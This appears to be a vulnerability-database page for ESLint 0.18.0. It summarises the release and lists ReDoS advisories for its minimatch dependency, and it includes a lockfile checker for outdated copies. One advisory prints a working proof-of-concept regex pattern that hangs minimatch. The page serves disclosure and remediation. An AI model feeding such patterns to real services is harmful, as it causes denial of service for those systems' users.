ESLint version 0.18.0 is an incremental update over its predecessor, version 0.17.1, of the popular JavaScript linting tool. Both versions share the core functionality of providing an AST-based pattern checker, aiding developers in maintaining code quality and consistency. The dependencies remain largely consistent between the two versions, ensuring a stable and familiar development environment for users upgrading. The chalk, debug, escope, espree, and js-yaml dependencies persist, reflecting the continued reliance on these packages for core linting operations and configuration parsing.
While the core dependencies are identical, the release date indicates a period of refinement and bug fixing between the versions. Developers can likely expect minor improvements in rule enforcement, performance enhancements, or resolutions to reported issues. The consistent set of devDependencies suggests that the testing and development workflows for ESLint remain largely unchanged, offering stability to contributors and maintainers. For developers using ESLint, upgrading from 0.17.1 to 0.18.0 is likely a low-risk endeavor, offering potential improvements without significant breaking changes. It is advisable to consult the changelog for a detailed list of specific bug fixes and enhancements included in this update. The MIT license continues to apply, ensuring open-source freedom for usage and modification.
All the vulnerabilities related to the version 0.18.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  // declare the loop counter locally so it does not leak into the global scope
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
// pattern: an unterminated character class followed by a long run of backslashes
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
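Whether a project still installs a copy older than 3.0.2 can be checked from its npm lockfile. The following is an added example, not code from the advisory or from the minimatch or ESLint projects; the function names, the package name example-dep and the sample lockfile are constructed for illustration.

```javascript
// Added example: flag minimatch copies older than the fixed version in an npm lockfile.
// FIXED_VERSION comes from the advisory text; all other names and data are constructed.
const FIXED_VERSION = "3.0.2";

// Numeric compare of "x.y.z" versions (<0, 0, >0). Assumption: prerelease tags are ignored.
function compareVersions(a, b) {
  const pa = a.split("-")[0].split(".").map(Number);
  const pb = b.split("-")[0].split(".").map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Handles both lockfile layouts: the flat "packages" map keyed by install path
// (lockfileVersion 2/3) and the nested "dependencies" tree (lockfileVersion 1).
function findVulnerableMinimatch(lock) {
  const hits = [];
  const check = (name, version, path) => {
    if (name === "minimatch" && version && compareVersions(version, FIXED_VERSION) < 0) {
      hits.push({ path, version });
    }
  };
  const walk = (deps, trail) => {
    for (const [name, info] of Object.entries(deps || {})) {
      check(name, info.version, trail.concat(name).join(" > "));
      walk(info.dependencies, trail.concat(name)); // nested copies can differ in version
    }
  };
  if (lock.packages) {
    for (const [installPath, info] of Object.entries(lock.packages)) {
      check(installPath.split("node_modules/").pop(), info.version, installPath);
    }
  } else {
    walk(lock.dependencies, []);
  }
  return hits;
}

// Constructed sample lockfile (v1 layout), not taken from a real project.
const sampleLock = {
  dependencies: {
    eslint: { version: "0.18.0", dependencies: { minimatch: { version: "2.0.10" } } },
    "example-dep": { version: "1.0.0", dependencies: { minimatch: { version: "3.0.2" } } },
    minimatch: { version: "0.3.0" },
  },
};
console.log(findVulnerableMinimatch(sampleLock));
```

Nested copies are reported with their full dependency path, which shows which parent package has to be upgraded to pull in a fixed minimatch.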
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.